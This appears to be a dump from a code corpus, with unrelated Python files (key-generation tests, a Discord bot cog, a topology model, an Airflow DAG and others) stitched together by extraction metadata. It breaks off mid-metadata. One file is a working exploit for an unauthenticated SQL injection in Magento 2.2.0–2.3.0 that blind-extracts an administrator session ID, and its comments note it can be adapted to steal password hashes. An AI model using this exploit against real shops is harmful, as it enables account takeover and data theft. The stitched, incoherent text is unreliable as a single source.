[((189, 203), 'pathlib.Path', 'Path', (['"""./.env"""'], {}), "('./.env')\n", (193, 203), False, 'from pathlib import Path\n'), ((204, 240), 'dotenv.load_dotenv', 'load_dotenv', ([], {'dotenv_path': 'dotenv_path'}), '(dotenv_path=dotenv_path)\n', (215, 240), False, 'from dotenv import load_dotenv\n'), ((251, 271), 'os.getenv', 'os.getenv', (['"""API_KEY"""'], {}), "('API_KEY')\n", (260, 271), False, 'import os\n'), ((281, 300), 'os.getenv', 'os.getenv', (['"""API_ID"""'], {}), "('API_ID')\n", (290, 300), False, 'import os\n'), ((386, 400), 'urllib.parse.quote', 'quote', (['keyword'], {}), '(keyword)\n', (391, 400), False, 'from urllib.parse import quote\n'), ((602, 618), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (612, 618), False, 'import json\n'), ((1087, 1103), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (1097, 1103), False, 'import json\n')]
|
# coding: utf-8
from django.test import TestCase
from cryptography.hazmat.primitives.asymmetric import rsa
from bounca.certificate_engine.ssl.key import Key
class KeyTest(TestCase):
def test_generate_private_key_2048(self):
keyhandler = Key()
keyhandler.create_key(2048)
self.assertEqual(keyhandler.key.key_size, 2048)
pkey = keyhandler.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_generate_private_key_4096(self):
prvkey = Key().create_key(4096)
self.assertEqual(prvkey.key.key_size, 4096)
pkey = prvkey.key.public_key()
self.assertIsInstance(pkey.public_numbers(), rsa.RSAPublicNumbers)
def test_serialize_keys_passphrase(self):
key = Key()
key.create_key(4096)
pem = key.serialize(b'test_store_keys_passphrase')
prvkey = key.load(pem, b'test_store_keys_passphrase')
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 4096)
def test_store_keys_no_object(self):
key = Key()
with self.assertRaisesMessage(RuntimeError, "No key object"):
key.serialize(b'test_store_keys_passphrase')
def test_store_keys_no_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize()
key = Key()
prvkey = key.load(pem)
self.assertIsInstance(prvkey.key, rsa.RSAPrivateKey)
self.assertEqual(prvkey.key.key_size, 2048)
def test_store_keys_wrong_passphrase(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_store_keys_wrong_passphrase')
with self.assertRaisesMessage(ValueError, 'Bad decrypt. Incorrect password?'):
key.load(pem, b'test_store_keys_passphrase')
def test_check_passphrase_valid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'check_passphrase')
self.assertTrue(key.check_passphrase(pem, b'check_passphrase'))
def test_check_passphrase_invalid(self):
key = Key()
key.create_key(2048)
pem = key.serialize(b'test_check_passphrase_invalid')
self.assertFalse(key.check_passphrase(pem, b'check_passphrase'))
|
[
"bounca.certificate_engine.ssl.key.Key"
] |
[((255, 260), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (258, 260), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((785, 790), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (788, 790), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1110, 1115), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1113, 1115), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1303, 1308), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1306, 1308), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1382, 1387), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1385, 1387), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1595, 1600), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1598, 1600), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((1897, 1902), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (1900, 1902), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((2113, 2118), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (2116, 2118), False, 'from bounca.certificate_engine.ssl.key import Key\n'), ((535, 540), 'bounca.certificate_engine.ssl.key.Key', 'Key', ([], {}), '()\n', (538, 540), False, 'from bounca.certificate_engine.ssl.key import Key\n')]
|
from discord.ext import commands
import discord
import asyncio
import logging
class AdminUtilsCog(commands.Cog, name="Admin Utilities"):
"""Cog for administrative commands, be these for users or to manage the bot.
All commands within this cog require administrative permissions or admin-like roles
"""
def __init__(self, bot):
self.bot = bot
self.db_conn_cog = None
self.logger = logging.getLogger("SVGEBot.AdminUtils")
self.delete_message_after = self.bot.bot_config["delete_msg_after"]
self.logger.info("Loaded AdminUtils")
@commands.Cog.listener()
async def on_ready(self):
self.db_conn_cog = self.bot.get_cog("DBConnPool")
async def cog_check(self, ctx):
"""This method is a cog wide check to ensure users have "admin" roles,
It will be called without the need for check decorators on every command.
"""
for role in ctx.message.author.roles:
if role.id in self.bot.bot_config["admin_role_id_list"]:
return True
return False
def cog_unload(self):
self.logger.info("Unloaded AdminUtils")
@commands.command()
async def shutdown(self, ctx):
"""Shuts the bot process down gracefully."""
await ctx.send(":wave:", delete_after=1)
try:
await self.db_conn_cog.shutdown()
except NameError:
pass
await asyncio.sleep(2)
await self.bot.logout()
self.logger.info("Logged out and closed Discord API connection")
self.logger.info("Closing process")
# This sleep is to avoid background loops getting messed with by an
# abrupt exit.
await asyncio.sleep(4)
exit(0)
@commands.command()
async def change_presence(self, ctx, activity, text=">>help"):
"""Changes the bot "presence" statement to that defined in command,
permitting it is one of those permitted by discord.
Command originally written for CyclopsBot by JayDwee.
:arg ctx: Command context, auto-filled by API wrapper.
:arg activity: Activity for the bot to display, must be one of:
:arg text: Text following the activity term"""
activity_list = {
"watching": discord.ActivityType.watching,
"streaming": discord.ActivityType.streaming,
"playing": discord.ActivityType.playing,
"listening": discord.ActivityType.listening
}
if activity.lower() not in activity_list.keys():
await ctx.send(f'"{activity}" is an invalid activity. "WatchingW, "streaming", '
f'"playing", and "listening" are currently supported',
delete_after=self.bot.delete_msg_after)
return
activity_type_to_show = discord.Activity(activity=activity_list[activity.lower()],
name=text)
await self.bot.change_presence(activity=activity_type_to_show)
self.logger.info(f"Activity changed to {activity} {text}")
await ctx.send(f"Activity changed as requested.", delete_after=self.bot.delete_msg_after)
def setup(bot):
bot.add_cog(AdminUtilsCog(bot))
|
[
"asyncio.sleep",
"discord.ext.commands.command",
"logging.getLogger",
"discord.ext.commands.Cog.listener"
] |
[((591, 614), 'discord.ext.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (612, 614), False, 'from discord.ext import commands\n'), ((1159, 1177), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1175, 1177), False, 'from discord.ext import commands\n'), ((1749, 1767), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (1765, 1767), False, 'from discord.ext import commands\n'), ((423, 462), 'logging.getLogger', 'logging.getLogger', (['"""SVGEBot.AdminUtils"""'], {}), "('SVGEBot.AdminUtils')\n", (440, 462), False, 'import logging\n'), ((1431, 1447), 'asyncio.sleep', 'asyncio.sleep', (['(2)'], {}), '(2)\n', (1444, 1447), False, 'import asyncio\n'), ((1710, 1726), 'asyncio.sleep', 'asyncio.sleep', (['(4)'], {}), '(4)\n', (1723, 1726), False, 'import asyncio\n')]
|
import util
import sys as _sys
class Topology:
def __init__(self, exp_config):
#System parameters
self.par2Dev = exp_config.system_config.device_placement.par2Dev
self.num_wafers = exp_config.system_config.num_wafers
self.num_nodes_per_wafer= exp_config.system_config.num_nodes_per_wafer
self.tot_nodes = exp_config.system_config.tot_nodes
self.adj = [[0 for x in range(self.tot_nodes)] for x in range(self.tot_nodes)]
#Parallelization Params
self.lp_dim = exp_config.sch_config.lp
self.dp_dim = exp_config.sch_config.dp
h1 = exp_config.sch_config.kp_hidden_dim1
s1 = exp_config.sch_config.kp_softmax_dim1
e1 = exp_config.sch_config.kp_embedding_dim1
p1 = exp_config.sch_config.kp_projection_dim1
h2 = exp_config.sch_config.kp_hidden_dim2
s2 = exp_config.sch_config.kp_softmax_dim2
e2 = exp_config.sch_config.kp_embedding_dim2
p2 = exp_config.sch_config.kp_projection_dim2
self.kp_dim = max(h1 * h2, s1 * s2, p1 * p2, e1 * e2)
#Verify system_hierarchy configuration is valid
try:
self.sanityCheckSysHierarchy()
except Exception as e:
print("Unexpected error occurred during sanity check of system hierarchy:\n"
"{}".format(e), flush=True)
_sys.exit(0)
#Network parameters
self.data_intra = True;
self.kernel_intra = True;
self.layer_intra = True;
self.mem_frac = exp_config.perimeter_breakdown.DRAM
self.inter_frac = exp_config.perimeter_breakdown.inter_node
self.intra_frac = exp_config.perimeter_breakdown.intra_node
self.createAdjacancyMatrix(kp = self.kp_dim, lp = self.lp_dim, dp = self.dp_dim);
self.interNodeDegree, self.intraNodeDegree = self.findMaxDegree()
self.intra_par = True if self.intraNodeDegree > 0 else False
self.inter_par = True if self.interNodeDegree > 0 else False
def sanityCheckSysHierarchy(self):
assert (self.tot_nodes == self.dp_dim * self.kp_dim * self.lp_dim), "tot_nodes != dp * kp * lp"
for key, val in self.par2Dev.items():
wafer_id, node_id = val
dp, lp, kp = key
#assert (dp < self.dp_dim), "data shard index out of bound"
assert (dp < self.dp_dim), "@wafer {}, node {}, data shard index ({}) >= data parallel shards ({})".format(wafer_id, node_id, dp, self.dp_dim)
assert (kp < self.kp_dim), "@wafer {}, node {}, kernel shard index ({}) >= kernel parallel shards ({})".format(wafer_id, node_id, kp, self.kp_dim)
assert (lp < self.lp_dim), "@wafer {}, node {}, layer shard index ({}) >= layer parallel shards ({})".format(wafer_id, node_id, lp, self.lp_dim)
def node_id(self, point):
wafer_id, node_id = point
return wafer_id * self.num_nodes_per_wafer + node_id
def createAdjacancyMatrix(self, kp, lp, dp):
#0 not connected
#1 connected internally
#2 connected externally
#connect kernel parallel connections
#Assumption: reduction is performed through ring-all-reduce algorithm
for i in range(0, dp):
for j in range(0, lp):
for k in range(0, kp):
start_point = self.par2Dev[(i,j,k)];
end_point = self.par2Dev[(i,j,(k+1) % kp)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.kernel_intra = False;
#connect layer parallel connections
#Assumption: across layers, for a given data shard, each kernel shard
#need to have connections to all kernel shards in previous layers.
#FIXME: This can be an overkill depending on the type of kernel parallelism.
for i in range(0, dp):
for j in reversed(range(1, lp)):
for k in range(0, kp):
end_point = self.par2Dev[(i,j,k)];
for m in range(0, kp):
start_point = self.par2Dev[(i,j-1,m)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.layer_intra = False;
#connect data parallel connections
#Assumption: within a layer, each parallel kernel can be reduced
for j in range(0, lp):
for k in range(0, kp):
for i in range(0, dp):
start_point = self.par2Dev[(i,j,k)];
end_point = self.par2Dev[((i + 1) % dp,j,k)];
start_point_id = self.node_id(start_point);
end_point_id = self.node_id(end_point);
if start_point_id != end_point_id:
start_point_wafer_id,_ = start_point
end_point_wafer_id,_ = end_point
self.adj[start_point_id][end_point_id] = \
(1 if (start_point_wafer_id == end_point_wafer_id) else 2)
if start_point_wafer_id != end_point_wafer_id:
self.data_intra = False;
#Across all wafers, across all nodes, find maximum inter and intra node degree
def findMaxDegree(self):
max_interNodeDegree = 0
max_intraNodeDegree = 0
for wid in range(0, self.num_wafers):
for cid in range(0, self.num_nodes_per_wafer):
nid = self.node_id((wid,cid));
interNodeDegree = 0
intraNodeDegree = 0
for i in range(0, self.tot_nodes):
if (self.adj[nid][i] == 1):
intraNodeDegree = intraNodeDegree + 1
elif (self.adj[nid][i] == 2):
interNodeDegree = interNodeDegree + 1
if (interNodeDegree > max_interNodeDegree):
max_interNodeDegree = interNodeDegree
if (intraNodeDegree > max_intraNodeDegree):
max_intraNodeDegree = intraNodeDegree
return max_interNodeDegree, max_intraNodeDegree
def get_fractions(self):
return self.inter_frac, self.intra_frac
#get P2P bandwidth between data shards
def getDataThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.data_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between kernel shards
def getKernelThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.kernel_intra
else (inter_bw, inter_lat))
#get P2P bandwidth between layer shards
def getLayerThroughput(self, intra_bw, inter_bw, intra_lat, inter_lat):
return ((intra_bw, intra_lat) if self.layer_intra
else (inter_bw, inter_lat))
|
[
"sys.exit"
] |
[((1505, 1517), 'sys.exit', '_sys.exit', (['(0)'], {}), '(0)\n', (1514, 1517), True, 'import sys as _sys\n')]
|
# %%
# test out geopy
import os
os.chdir(os.path.dirname(os.getcwd())) # make directory one step up the current directory
from geopy.geocoders import Nominatim
geolocator = Nominatim(user_agent='<PASSWORD>_agent')
location = geolocator.geocode('175 5th Avenue NYC')
print(location.address)
print((location.latitude, location.longitude))
#print(location.raw)
# %%
# test out python maps
import folium
m = folium.Map(location=[location.latitude, location.longitude], zoom_start=13)
m.save('outputs/test-map.html')
# %%
|
[
"os.getcwd",
"folium.Map",
"geopy.geocoders.Nominatim"
] |
[((175, 215), 'geopy.geocoders.Nominatim', 'Nominatim', ([], {'user_agent': '"""<PASSWORD>_agent"""'}), "(user_agent='<PASSWORD>_agent')\n", (184, 215), False, 'from geopy.geocoders import Nominatim\n'), ((408, 483), 'folium.Map', 'folium.Map', ([], {'location': '[location.latitude, location.longitude]', 'zoom_start': '(13)'}), '(location=[location.latitude, location.longitude], zoom_start=13)\n', (418, 483), False, 'import folium\n'), ((57, 68), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (66, 68), False, 'import os\n')]
|
#!/usr/bin/env python3
# Magento 2.2.0 <= 2.3.0 Unauthenticated SQLi
# <NAME>
# 2019-03-22
#
# SOURCE & SINK
# The sink (from-to SQL condition) has been present from Magento 1.x onwards.
# The source (/catalog/product_frontend_action/synchronize) from 2.2.0.
# If your target runs Magento < 2.2.0, you need to find another source.
#
# SQL INJECTION
# The exploit can easily be modified to obtain other stuff from the DB, for
# instance admin/user password hashes.
#
import requests
import string
import binascii
import re
import random
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
sid = sqli.get_most_recent_session()
except ExploitError as e:
print('Error: %s' % e)
def random_string(n=8):
return ''.join(random.choice(string.ascii_letters) for _ in range(n))
class ExploitError(Exception):
pass
class Browser:
"""Basic browser functionality along w/ URLs and payloads.
"""
PROXY = None
def __init__(self, URL):
self.URL = URL
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {
'http': self.PROXY,
'https': self.PROXY,
}
class SQLInjection(Browser):
"""SQL injection stuff.
"""
def encode(self, string):
return '0x' + binascii.b2a_hex(string.encode()).decode()
def find_test_method(self):
"""Tries to inject using an error-based technique, or falls back to timebased.
"""
for test_method in (self.test_error, self.test_timebased):
if test_method('123=123') and not test_method('123=124'):
self.test = test_method
break
else:
raise ExploitError('Test SQL injections failed, not vulnerable ?')
def test_timebased(self, condition):
"""Runs a test. A valid condition results in a sleep of 1 second.
"""
payload = '))) OR (SELECT*FROM (SELECT SLEEP((%s)))a)=1 -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.elapsed.total_seconds() > 1
def test_error(self, condition):
"""Runs a test. An invalid condition results in an SQL error.
"""
payload = '))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE %s) -- -' % condition
r = self.s.get(
self.URL + '/catalog/product_frontend_action/synchronize',
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
if r.status_code not in (200, 400):
raise ExploitError(
'SQL injection does not yield a correct HTTP response'
)
return r.status_code == 400
def word(self, name, sql, size=None, charset=None):
"""Dichotomically obtains a value.
"""
pattern = 'LOCATE(SUBSTR((%s),%d,1),BINARY %s)=0'
full = ''
check = False
if size is None:
# Yeah whatever
size_size = self.word(
name,
'LENGTH(LENGTH(%s))' % sql,
size=1,
charset=string.digits
)
size = self.word(
name,
'LENGTH(%s)' % sql,
size=int(size_size),
charset=string.digits
)
size = int(size)
print("%s: %s" % (name, full), end='\r')
for p in range(size):
c = charset
while len(c) > 1:
middle = len(c) // 2
h0, h1 = c[:middle], c[middle:]
condition = pattern % (sql, p+1, self.encode(h0))
c = h1 if self.test(condition) else h0
full += c
print("%s: %s" % (name, full), end='\r')
print(' ' * len("%s: %s" % (name, full)), end='\r')
return full
def get_most_recent_session(self):
"""Grabs the last created session. We don't need special privileges aside from creating a product so any session
should do. Otherwise, the process can be improved by grabbing each session one by one and trying to reach the
backend.
"""
# This is the default admin session timeout
session_timeout = 900
query = (
'SELECT %%s FROM admin_user_session '
'WHERE TIMESTAMPDIFF(SECOND, updated_at, NOW()) BETWEEN 0 AND %d '
'ORDER BY created_at DESC, updated_at DESC LIMIT 1'
) % session_timeout
# Check if a session is available
available = not self.test('(%s)=0' % (query % 'COUNT(*)'))
if not available:
raise ExploitError('No session is available')
print('An admin session is available !')
# Fetch it
sid = self.word(
'Session ID',
query % 'session_id',
charset=string.ascii_lowercase + string.digits,
size=26
)
print('Session ID: %s' % sid)
return sid
run(sys.argv[1])
|
[
"requests.packages.urllib3.disable_warnings",
"requests.Session",
"string.encode",
"random.choice"
] |
[((614, 689), 'requests.packages.urllib3.disable_warnings', 'requests.packages.urllib3.disable_warnings', ([], {'category': 'InsecureRequestWarning'}), '(category=InsecureRequestWarning)\n', (656, 689), False, 'import requests\n'), ((1199, 1217), 'requests.Session', 'requests.Session', ([], {}), '()\n', (1215, 1217), False, 'import requests\n'), ((927, 962), 'random.choice', 'random.choice', (['string.ascii_letters'], {}), '(string.ascii_letters)\n', (940, 962), False, 'import random\n'), ((1526, 1541), 'string.encode', 'string.encode', ([], {}), '()\n', (1539, 1541), False, 'import string\n')]
|
import os
import tempfile
import numpy as np
import pytest
import calliope
def verify_solution_integrity(model_solution, solution_from_disk, tempdir):
# Check whether the two are the same
np.allclose(model_solution['e_cap'], solution_from_disk['e_cap'])
# Check that config AttrDict has been deserialized
assert(solution_from_disk.attrs['config_run'].output.path == tempdir)
class TestSave:
@pytest.fixture(scope='module')
def model(self):
model = calliope.Model()
model.run()
return model
def test_save_netcdf(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('netcdf')
# Try reading solution back in
sol_file = os.path.join(tempdir, 'solution.nc')
solution_from_disk = calliope.read.read_netcdf(sol_file)
solution_from_disk.close() # so that temp dir can be deleted
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
def test_save_csv(self, model):
with tempfile.TemporaryDirectory() as tempdir:
model.config_run.set_key('output.path', tempdir)
model.save_solution('csv')
# Try reading solution back in
solution_from_disk = calliope.read.read_csv(tempdir)
verify_solution_integrity(model.solution, solution_from_disk, tempdir)
|
[
"tempfile.TemporaryDirectory",
"calliope.read.read_netcdf",
"numpy.allclose",
"pytest.fixture",
"calliope.read.read_csv",
"calliope.Model",
"os.path.join"
] |
[((208, 273), 'numpy.allclose', 'np.allclose', (["model_solution['e_cap']", "solution_from_disk['e_cap']"], {}), "(model_solution['e_cap'], solution_from_disk['e_cap'])\n", (219, 273), True, 'import numpy as np\n'), ((435, 465), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (449, 465), False, 'import pytest\n'), ((503, 519), 'calliope.Model', 'calliope.Model', ([], {}), '()\n', (517, 519), False, 'import calliope\n'), ((614, 643), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (641, 643), False, 'import tempfile\n'), ((826, 862), 'os.path.join', 'os.path.join', (['tempdir', '"""solution.nc"""'], {}), "(tempdir, 'solution.nc')\n", (838, 862), False, 'import os\n'), ((896, 931), 'calliope.read.read_netcdf', 'calliope.read.read_netcdf', (['sol_file'], {}), '(sol_file)\n', (921, 931), False, 'import calliope\n'), ((1136, 1165), 'tempfile.TemporaryDirectory', 'tempfile.TemporaryDirectory', ([], {}), '()\n', (1163, 1165), False, 'import tempfile\n'), ((1355, 1386), 'calliope.read.read_csv', 'calliope.read.read_csv', (['tempdir'], {}), '(tempdir)\n', (1377, 1386), False, 'import calliope\n')]
|
import datetime
import io
import gzip
import json
import time
from airflow import DAG
from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator
from airflow.hooks.S3_hook import S3Hook
from airflow.operators.python_operator import PythonOperator
from airflow.models import Variable
import pytz
import requests
import yaml
from jinja2 import PackageLoader
import pkg_resources
from kite_airflow.slack_alerts import task_fail_slack_alert
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': datetime.datetime(2020, 1, 1),
'email_on_failure': False,
'email_on_retry': False,
'retries': 1,
'retry_delay': datetime.timedelta(minutes=5),
'on_failure_callback': task_fail_slack_alert,
}
dag = DAG(
'mixpanel_ingest',
default_args=default_args,
description='Mixpanel data ingest DAG.',
schedule_interval='10 4 * * *',
max_active_runs=1,
jinja_environment_kwargs={
'loader': PackageLoader('kite_airflow', 'templates')
},
)
pacific = pytz.timezone('America/Los_Angeles')
people_schema = yaml.load(pkg_resources.resource_stream('kite_airflow', 'files/mixpanel_people.schema.yaml'), Loader=yaml.FullLoader)
def copy_profile_deltas(task_instance, execution_date, prev_execution_date_success, next_execution_date, **context):
ex_day = execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
if prev_execution_date_success:
ex_day = prev_execution_date_success.replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(days=1)
next_ex_day = next_execution_date.replace(hour=0, minute=0, second=0, microsecond=0)
chunks = [ex_day]
while chunks[-1] < next_ex_day:
chunks.append(chunks[-1] + datetime.timedelta(hours=4))
gz_file = io.BytesIO()
with gzip.GzipFile(fileobj=gz_file, mode="w") as f:
start_date = chunks.pop(0)
for chunk in chunks:
filters = []
for cmp, dt in [['>=', start_date], ['<', chunk]]:
filters.append('user.time {} {}'.format(cmp, 1000 * int(time.mktime(dt.astimezone(pacific).timetuple()))))
start_date = chunk
print(filters)
script = 'function main() {{ return People().filter(function(user) {{ return {}; }})}}'.format(' && '.join(filters))
res = requests.post('https://mixpanel.com/api/2.0/jql',
auth=(Variable.get('mixpanel_credentials', deserialize_json=True)['secret'], ''),
data={'script': script})
if res.status_code != 200:
raise Exception(res.text)
for line in res.json():
to_scrub = [line]
while to_scrub:
curr = to_scrub.pop(0)
for key, value in list(curr.items()):
if isinstance(value, (dict, list)) and len(value) == 0:
del curr[key]
if isinstance(value, dict):
to_scrub.append(value)
if key.startswith('$'):
curr[key[1:]] = value
del curr[key]
for ts_field in ['last_seen', 'time']:
pacific_ts = datetime.datetime.fromtimestamp(line[ts_field] / 1000).replace(tzinfo=pacific)
line[ts_field] = int(time.mktime(pacific_ts.astimezone(pytz.utc).timetuple()))
f.write(json.dumps(line).encode('utf8'))
f.write(b'\n')
s3 = S3Hook('aws_us_east_1')
key = 'mixpanel/people/raw/year={}/month={}/day={}/deltas.json.gz'.format(
execution_date.year, execution_date.month, execution_date.day
)
s3.load_bytes(gz_file.getvalue(), key, 'kite-metrics')
PythonOperator(
python_callable=copy_profile_deltas,
task_id=copy_profile_deltas.__name__,
dag=dag,
retries=2,
provide_context=True,
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='rollup_people',
query='athena/queries/mixpanel_people_rollup.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='cleanup_rollup_table',
query="DROP TABLE mixpanel_people_rollup_{{ds_nodash}}",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='update_people_table_location',
query="""ALTER TABLE mixpanel_people
SET LOCATION 's3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/'""",
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=dag,
params={'schema': people_schema},
)
ddl_dag = DAG(
'mixpanel_ingest_schema_update',
default_args=default_args,
description='Mixpanel data schema definition.',
schedule_interval=None,
max_active_runs=1,
)
for table_name, s3_prefix in {'mixpanel_people_raw': 'mixpanel/people/raw', 'mixpanel_people': 'mixpanel/people/rollups'}.items():
AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='drop_{}'.format(table_name),
query='DROP TABLE {{params.table_name}}',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={'table_name': table_name},
) >> AWSAthenaOperator(
aws_conn_id='aws_us_east_1',
task_id='create_{}'.format(table_name),
query='athena/tables/mixpanel_people.tmpl.sql',
output_location='s3://kite-metrics-test/athena-results/ddl',
database='kite_metrics',
dag=ddl_dag,
params={
'schema': people_schema,
'table_name': table_name,
's3_prefix': s3_prefix,
'partitioned': table_name == 'mixpanel_people_raw',
'json': table_name == 'mixpanel_people_raw',
}
)
|
[
"io.BytesIO",
"airflow.hooks.S3_hook.S3Hook",
"airflow.DAG",
"airflow.operators.python_operator.PythonOperator",
"pkg_resources.resource_stream",
"airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator",
"airflow.models.Variable.get",
"datetime.datetime",
"json.dumps",
"jinja2.PackageLoader",
"datetime.timedelta",
"pytz.timezone",
"gzip.GzipFile",
"datetime.datetime.fromtimestamp"
] |
[((1040, 1076), 'pytz.timezone', 'pytz.timezone', (['"""America/Los_Angeles"""'], {}), "('America/Los_Angeles')\n", (1053, 1076), False, 'import pytz\n'), ((5017, 5180), 'airflow.DAG', 'DAG', (['"""mixpanel_ingest_schema_update"""'], {'default_args': 'default_args', 'description': '"""Mixpanel data schema definition."""', 'schedule_interval': 'None', 'max_active_runs': '(1)'}), "('mixpanel_ingest_schema_update', default_args=default_args, description\n ='Mixpanel data schema definition.', schedule_interval=None,\n max_active_runs=1)\n", (5020, 5180), False, 'from airflow import DAG\n'), ((546, 575), 'datetime.datetime', 'datetime.datetime', (['(2020)', '(1)', '(1)'], {}), '(2020, 1, 1)\n', (563, 575), False, 'import datetime\n'), ((674, 703), 'datetime.timedelta', 'datetime.timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (692, 703), False, 'import datetime\n'), ((1103, 1189), 'pkg_resources.resource_stream', 'pkg_resources.resource_stream', (['"""kite_airflow"""', '"""files/mixpanel_people.schema.yaml"""'], {}), "('kite_airflow',\n 'files/mixpanel_people.schema.yaml')\n", (1132, 1189), False, 'import pkg_resources\n'), ((1799, 1811), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (1809, 1811), False, 'import io\n'), ((3586, 3609), 'airflow.hooks.S3_hook.S3Hook', 'S3Hook', (['"""aws_us_east_1"""'], {}), "('aws_us_east_1')\n", (3592, 3609), False, 'from airflow.hooks.S3_hook import S3Hook\n'), ((4572, 4993), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""update_people_table_location"""', 'query': '"""ALTER TABLE mixpanel_people\nSET LOCATION \'s3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/\'"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), '(aws_conn_id=\'aws_us_east_1\', task_id=\n \'update_people_table_location\', query=\n """ALTER TABLE mixpanel_people\nSET LOCATION \'s3://kite-metrics/mixpanel/people/rollups/year={{execution_date.year}}/month={{execution_date.month}}/day={{execution_date.day}}/\'"""\n , output_location=\'s3://kite-metrics-test/athena-results/ddl\', database\n =\'kite_metrics\', dag=dag, params={\'schema\': people_schema})\n', (4589, 4993), False, 'from airflow.contrib.operators.aws_athena_operator import AWSAthenaOperator\n'), ((1822, 1862), 'gzip.GzipFile', 'gzip.GzipFile', ([], {'fileobj': 'gz_file', 'mode': '"""w"""'}), "(fileobj=gz_file, mode='w')\n", (1835, 1862), False, 'import gzip\n'), ((4273, 4556), 'airflow.contrib.operators.aws_athena_operator.AWSAthenaOperator', 'AWSAthenaOperator', ([], {'aws_conn_id': '"""aws_us_east_1"""', 'task_id': '"""cleanup_rollup_table"""', 'query': '"""DROP TABLE mixpanel_people_rollup_{{ds_nodash}}"""', 'output_location': '"""s3://kite-metrics-test/athena-results/ddl"""', 'database': '"""kite_metrics"""', 'dag': 'dag', 'params': "{'schema': people_schema}"}), "(aws_conn_id='aws_us_east_1', task_id=\n 'cleanup_rollup_table', query=\n 'DROP TABLE mixpanel_people_rollup_{{ds_nodash}}', output_location=\n 's3://kite-metrics-test/athena-results/ddl', database='kite_metrics',\n dag=dag, params={'schema': people_schema})\n", (4290, 4556), False, 